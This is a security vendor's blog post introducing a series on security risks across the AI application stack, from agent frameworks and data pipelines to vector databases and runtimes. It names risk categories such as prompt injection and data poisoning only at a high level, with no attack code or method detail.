Security Risks Across the AI Application Stack: A Researcher’s Guide

This series will dissect the AI application stack layer by layer, analyzing real-world security issues in the packages, frameworks, and runtimes that developers rely on today.

Introduction

The modern AI application stack is being built on JavaScript and TypeScript. From large language model (LLM) orchestration to vector databases, from preprocessing pipelines to edge runtimes, enterprises are wiring AI directly into production systems at unprecedented speed. This stack is powerful, but it is not secure by default.

Application security teams must understand where the risks live. Attacks rarely target the model in isolation. They target the glue code, the runtimes, the frameworks, and the dependencies that stitch AI applications together. The AI stack is just another application stack—but one where immaturity, rapid adoption, and novel attack surfaces collide.

This series will dissect the AI application stack layer by layer, analyzing real-world security issues in the packages, frameworks, and runtimes that developers rely on today.

Mapping the AI Application Stack

The AI application stack can be broken into five layers, each with distinct security considerations.

1. Agent Frameworks

Frameworks such as LangChain, LangGraph, and CrewAI connect LLMs to external tools, APIs, and workflows. They enable automation but expose risks including prompt injection, tool exploitation, and API overreach.

2. Full-Stack Frameworks

Front-end and server-side frameworks such as Next.js (Vercel), React, Vue, and Angular power most enterprise AI applications. They inherit well-known issues like DOM clobbering, cross-site scripting, and dependency compromise.

3. Data Pipelines

Libraries such as TensorFlow.js, Transformers.js, and Hugging Face Datasets/Tokenizers.js handle preprocessing, inference, and embedding management. They introduce risks of poisoned models, dataset manipulation, and WASM runtime vulnerabilities.

4. Vector Databases

Backends such as Pinecone, Weaviate, and Milvus store embeddings and power semantic search. Security issues include data exfiltration through query abuse, metadata injection, and poisoning attacks.

5. Runtimes and Deployment Environments

Execution layers such as Node.js, Deno, and Bun support AI backends. Serverless and edge runtimes such as AWS Lambda, Vercel Edge Functions, and Cloudflare Workers introduce additional risks. Common issues include metadata credential theft, prototype pollution, build pipeline compromise, and misconfigured permissions.

Why Security Teams Need a Stack-Wide View

Security issues in AI applications are not isolated events. They chain across layers. A poisoned dataset ingested through Hugging Face may be embedded into Pinecone, retrieved by LangChain, and then exfiltrated through a Next.js API endpoint running on Vercel Edge. Each layer amplifies the next.

Traditional scanning tools are not designed for this context. They flag theoretical CVEs without proving whether they are exploitable in production. What matters is runtime exploitability: whether the vulnerability is reachable, whether it executes, and whether it can be chained with others.

What This Series Covers

This series will publish 8 posts on:

Each post will document real-world security issues, provide MITRE ATT&CK mappings, and cite references for further research.

Conclusion

The AI application stack is becoming enterprise infrastructure. Its attack surface is broad, immature, and expanding. For security researchers and product security teams, the goal is not to treat AI as “special,” but to treat it as potentially vulnerable application code, because that is what it is.

This series will show how vulnerabilities propagate through the stack and provide a framework for defending AI applications in production.

Table of contents

Related blogs

Prompt Injection was Never the Real Problem

A review of “The Promptware Kill Chain”Over the last two years, “prompt injection” has become the SQL injection of the LLM era: widely referenced, poorly defined, and often blamed for failures that have little to do with prompts themselves.A recent arXiv paper, “The Promptware Kill Chain: How Prompt Injections Gradually Evolved Into a Multi-Step Malware,” tries to correct that by reframing prompt injection as just the initial access phase of a broader, multi-stage attack chain.As a security researcher working on real production AppSec and AI systems, I think this paper is directionally right and operationally incomplete.This post is a technical critique: what the paper gets right, where the analogy breaks down, and how defenders should actually think about agentic system compromise.

January 16, 2026

A Guide to Securing AI Code Editors: Cursor, Claude Code, Gemini CLI, and OpenAI Codex

AI-powered code editors such as Cursor, Claude Code, Gemini CLI, and OpenAI Codex are rapidly becoming part of enterprise development environments.

October 31, 2025

From Discovery to Resolution: A Single Source of Truth for Vulnerability Statuses

Continuous visibility from first discovery to final resolution across code repositories and container images, showing who fixed each vulnerability, when it was resolved and how long closure took. Kodem turns issue statuses into ownership for engineers, progress tracking for leadership and defensible risk reduction for application security.

October 27, 2025

Stop the waste.
Protect your environment with Kodem.

Get a personalized demo
Get a personalized demo

A Primer on Runtime Intelligence

See how Kodem's cutting-edge sensor technology revolutionizes application monitoring at the kernel level.

5.1k
Applications covered
1.1m
False positives eliminated
4.8k
Triage hours reduced

Platform Overview Video

Watch our short platform overview video to see how Kodem discovers real security risks in your code at runtime.

5.1k
Applications covered
1.1m
False positives eliminated
4.8k
Triage hours reduced

The State of the Application Security Workflow

This report aims to equip readers with actionable insights that can help future-proof their security programs. Kodem, the publisher of this report, purpose built a platform that bridges these gaps by unifying shift-left strategies with runtime monitoring and protection.

Get real-time insights across the full stack…code, containers, OS, and memory

Watch how Kodem’s runtime security platform detects and blocks attacks before they cause damage. No guesswork. Just precise, automated protection.

Stay up-to-date on Audit Nexus

A curated resource for the many updates to cybersecurity and AI risk regulations, frameworks, and standards.

Mahesh Babu
Publish date

0 min read

Application Security